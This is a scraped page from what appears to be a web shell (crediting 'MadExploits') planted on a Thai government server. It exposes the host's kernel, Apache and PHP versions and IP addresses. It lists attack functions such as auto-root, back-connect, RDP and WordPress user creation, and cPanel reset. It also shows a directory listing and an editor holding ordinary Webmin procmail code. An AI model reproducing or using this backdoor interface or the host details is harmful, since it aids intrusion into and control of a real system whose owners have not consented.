Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
procmail /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
289
B
-rw-r--r--
backup_config.pl
649
B
-rwxr-xr-x
cgi_args.pl
488
B
-rwxr-xr-x
config
56
B
-rw-r--r--
config-freebsd
66
B
-rw-r--r--
config.info
237
B
-rw-r--r--
config.info.ca
276
B
-rw-r--r--
config.info.ca.UTF-8
281
B
-rw-r--r--
config.info.cz
205
B
-rw-r--r--
config.info.cz.UTF-8
212
B
-rw-r--r--
config.info.de
265
B
-rw-r--r--
config.info.de.UTF-8
265
B
-rw-r--r--
config.info.es
57
B
-rw-r--r--
config.info.es.UTF-8
57
B
-rw-r--r--
config.info.fr
281
B
-rw-r--r--
config.info.fr.UTF-8
281
B
-rw-r--r--
config.info.hu
0
B
-rw-r--r--
config.info.ko_KR.UTF-8
272
B
-rw-r--r--
config.info.ko_KR.euc
218
B
-rw-r--r--
config.info.nl
262
B
-rw-r--r--
config.info.nl.UTF-8
262
B
-rw-r--r--
config.info.no
244
B
-rw-r--r--
config.info.no.UTF-8
244
B
-rw-r--r--
config.info.pl
0
B
-rw-r--r--
config.info.ru.UTF-8
278
B
-rw-r--r--
config.info.ru_RU
175
B
-rw-r--r--
config.info.ru_RU.UTF-8
278
B
-rw-r--r--
config.info.ru_SU
175
B
-rw-r--r--
config.info.uk_UA
188
B
-rw-r--r--
config.info.uk_UA.UTF-8
288
B
-rw-r--r--
delete_recipes.cgi
418
B
-rwxr-xr-x
down.cgi
277
B
-rwxr-xr-x
edit_env.cgi
1022
B
-rwxr-xr-x
edit_inc.cgi
864
B
-rwxr-xr-x
edit_recipe.cgi
2.75
KB
-rwxr-xr-x
index.cgi
4.66
KB
-rwxr-xr-x
install_check.pl
483
B
-rwxr-xr-x
log_parser.pl
764
B
-rwxr-xr-x
manual_form.cgi
533
B
-rwxr-xr-x
manual_save.cgi
331
B
-rwxr-xr-x
module.info
198
B
-rw-r--r--
module.info.ca
142
B
-rw-r--r--
module.info.ca.UTF-8
154
B
-rw-r--r--
module.info.cz
33
B
-rw-r--r--
module.info.cz.UTF-8
41
B
-rw-r--r--
module.info.de
149
B
-rw-r--r--
module.info.de.UTF-8
161
B
-rw-r--r--
module.info.es
34
B
-rw-r--r--
module.info.es.UTF-8
40
B
-rw-r--r--
module.info.fr
36
B
-rw-r--r--
module.info.fr.UTF-8
42
B
-rw-r--r--
module.info.hu
34
B
-rw-r--r--
module.info.hu.UTF-8
43
B
-rw-r--r--
module.info.it
37
B
-rw-r--r--
module.info.it.UTF-8
43
B
-rw-r--r--
module.info.ko_KR.UTF-8
40
B
-rw-r--r--
module.info.ko_KR.euc
34
B
-rw-r--r--
module.info.ms_MY
138
B
-rw-r--r--
module.info.ms_MY.UTF-8
150
B
-rw-r--r--
module.info.nl
31
B
-rw-r--r--
module.info.nl.UTF-8
37
B
-rw-r--r--
module.info.no
31
B
-rw-r--r--
module.info.no.UTF-8
37
B
-rw-r--r--
module.info.pl
33
B
-rw-r--r--
module.info.pl.UTF-8
39
B
-rw-r--r--
module.info.ru.UTF-8
53
B
-rw-r--r--
module.info.ru_RU
36
B
-rw-r--r--
module.info.ru_RU.UTF-8
56
B
-rw-r--r--
module.info.ru_SU
36
B
-rw-r--r--
procmail-lib.pl
8.98
KB
-rwxr-xr-x
save_env.cgi
753
B
-rwxr-xr-x
save_inc.cgi
680
B
-rwxr-xr-x
save_recipe.cgi
2.58
KB
-rwxr-xr-x
up.cgi
271
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_recipe.cgi
#!/usr/bin/perl # edit_receipe.cgi # Display a form for editing or creating a procmail receipe require './procmail-lib.pl'; &ReadParse(); if ($in{'new'}) { &ui_print_header(undef, $text{'edit_title1'}, ""); $block++ if ($in{'block'}); } else { &ui_print_header(undef, $text{'edit_title2'}, ""); @conf = &get_procmailrc(); $rec = $conf[$in{'idx'}]; $block++ if (defined($rec->{'block'})); } print &ui_form_start("save_recipe.cgi"); print &ui_hidden("new", $in{'new'}); print &ui_hidden("idx", $in{'idx'}); print &ui_hidden("before", $in{'before'}); print &ui_hidden("after", $in{'after'}); print &ui_hidden("block", $block); print &ui_table_start($text{'edit_header1'}, "width=100%", 2); if ($block) { # Start of a conditional block local @lines = split(/\n/, $rec->{'block'}); local $r = @lines > 5 ? 10 : 5; print &ui_table_row($text{'edit_block'}, &ui_textarea("bdata", $rec->{'block'}, $r, 80)); } else { # Simple action ($t, $a) = &parse_action($rec); print &ui_table_row($text{'edit_action'}, &ui_select("amode", $t, [ map { [ $_, $text{"edit_amode_".$_} ] } (0, 2, 1, 3, 4, 6) ])." ". &ui_textbox("action", $t == 6 ? $rec->{'action'} : $a, 40)); } # Action options @grid = ( ); foreach $f (@known_flags) { push(@grid, &ui_checkbox("flag", $f, $text{"edit_flag_$f"}, &indexof($f, @{$rec->{'flags'}}) >= 0)); } print &ui_table_row(undef, &ui_grid_table(\@grid, 2, 100), 2); # Lock file $ldef = $rec->{'lockfile'} ? 0 : defined($rec->{'lockfile'}) ? 2 : 1; print &ui_table_row($text{'edit_lockfile'}, &ui_radio("lockfile_def", $ldef, [ [ 1, $text{'edit_none'} ], [ 2, $text{'default'} ], [ 0, $text{'edit_lock'}." ". &ui_textbox("lockfile", $rec->{'lockfile'}, 40) ] ])); print &ui_table_end(); # Show conditions section print &ui_table_start($text{'edit_header2'}, "width=100%", 2); print &ui_table_row(undef, $text{'edit_conddesc'}, 2); $ctable = &ui_columns_start([ $text{'edit_ctype'}, $text{'edit_cvalue'} ], 100); $i = 0; foreach $c (@{$rec->{'conds'}}, [ '-' ], [ '-' ] ) { $ctable .= &ui_columns_row([ &ui_select("cmode_$i", $c->[0], [ [ '-', ' ' ], [ '', $text{'edit_cmode_re'} ], [ '!', $text{'edit_cmode_nre'} ], [ '$', $text{'edit_cmode_shell'} ], [ '?', $text{'edit_cmode_exit'} ], [ '<', $text{'edit_cmode_lt'} ], [ '>', $text{'edit_cmode_gt'} ] ]), &ui_textbox("cond_$i", $c->[1], 60, 0, undef, "style='width:100%'"), ]); $i++; } $ctable .= &ui_columns_end(); print &ui_table_row(undef, $ctable, 2); print &ui_table_end(); # Show save buttons if ($in{'new'}) { print &ui_form_end([ [ undef, $text{'create'} ] ]); } else { print &ui_form_end([ [ undef, $text{'save'} ], [ 'delete', $text{'delete'} ] ]); } &ui_print_footer("", $text{'index_return'});
Close